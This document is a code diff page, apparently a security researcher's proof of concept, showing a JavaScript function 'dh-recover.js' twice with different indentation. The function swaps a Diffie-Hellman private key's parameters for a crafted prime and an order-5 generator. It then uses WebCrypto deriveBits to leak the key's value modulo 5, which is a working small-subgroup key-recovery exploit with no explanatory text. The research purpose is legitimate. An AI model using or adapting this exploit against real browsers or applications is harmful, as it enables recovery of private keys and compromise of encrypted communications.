asanso · January 6, 2020 16:05
diff --git a/dh-recover.js b/dh-recover.js
 function recover(privateKey) {
    console.log("recover");
    const MALICIOUS_PRIME = new Uint8Array([129,0,0,0,0,0,0,0,0,0,0,0,0,0,0,17]);
    // this generator has order 5
    const MALICIOUS_GENERATOR = new Uint8Array([46,35,147,92,93,21,176,170,70,144,93,164,112,85,178,126]);

    privateKey.algorithm.generator =  MALICIOUS_GENERATOR;
    privateKey.algorithm.prime =  MALICIOUS_PRIME;
    window.crypto.subtle.generateKey(
    {
        name: "DH",
        prime: MALICIOUS_PRIME,
        generator: MALICIOUS_GENERATOR,
    },
    false, //whether the key is extractable (i.e. can be used in exportKey)
    ["deriveKey", "deriveBits"] //can be any combination of "deriveKey" and "deriveBits"
    )
    .then(function(maliciousKey){
         
        window.crypto.subtle.deriveBits(
        {
            name: "DH",
            prime: MALICIOUS_PRIME,
            generator: MALICIOUS_GENERATOR,
            public: maliciousKey.publicKey, //a DH public key from generateKey or importKey
        },
        maliciousKey.privateKey, //your DH private key from generateKey or importKey
        128 //the number of bits you want to derive
        )
        .then(function(bits){
            array = new Uint8Array(bits);
            if (array[0] == 46) {
                alert("the private key is equal to 1 mod 5")
            }
            if (array[0] == 115) {
                alert("the private key is equal to 2 mod 5")
            }
            if (array[0] == 58) {
                alert("the private key is equal to 3 mod 5")
            }
            if (array[0] == 38) {
                alert("the private key is equal to 4 mod 5")
            }
            console.log(array);

        }).catch(function(err){
            console.error(err);
        });
    });
 }
	function recover(privateKey) {
	console.log("recover");
	const MALICIOUS_PRIME = new Uint8Array([129,0,0,0,0,0,0,0,0,0,0,0,0,0,0,17]);
	// this generator has order 5
	const MALICIOUS_GENERATOR = new Uint8Array([46,35,147,92,93,21,176,170,70,144,93,164,112,85,178,126]);

	privateKey.algorithm.generator = MALICIOUS_GENERATOR;
	privateKey.algorithm.prime = MALICIOUS_PRIME;
	window.crypto.subtle.generateKey(
	{
	name: "DH",
	prime: MALICIOUS_PRIME,
	generator: MALICIOUS_GENERATOR,
	},
	false, //whether the key is extractable (i.e. can be used in exportKey)
	["deriveKey", "deriveBits"] //can be any combination of "deriveKey" and "deriveBits"
	)
	.then(function(maliciousKey){

	window.crypto.subtle.deriveBits(
	{
	name: "DH",
	prime: MALICIOUS_PRIME,
	generator: MALICIOUS_GENERATOR,
	public: maliciousKey.publicKey, //a DH public key from generateKey or importKey
	},
	maliciousKey.privateKey, //your DH private key from generateKey or importKey
	128 //the number of bits you want to derive
	)
	.then(function(bits){
	array = new Uint8Array(bits);
	if (array[0] == 46) {
	alert("the private key is equal to 1 mod 5")
	}
	if (array[0] == 115) {
	alert("the private key is equal to 2 mod 5")
	}
	if (array[0] == 58) {
	alert("the private key is equal to 3 mod 5")
	}
	if (array[0] == 38) {
	alert("the private key is equal to 4 mod 5")
	}
	console.log(array);

	}).catch(function(err){
	console.error(err);
	});
	});
	}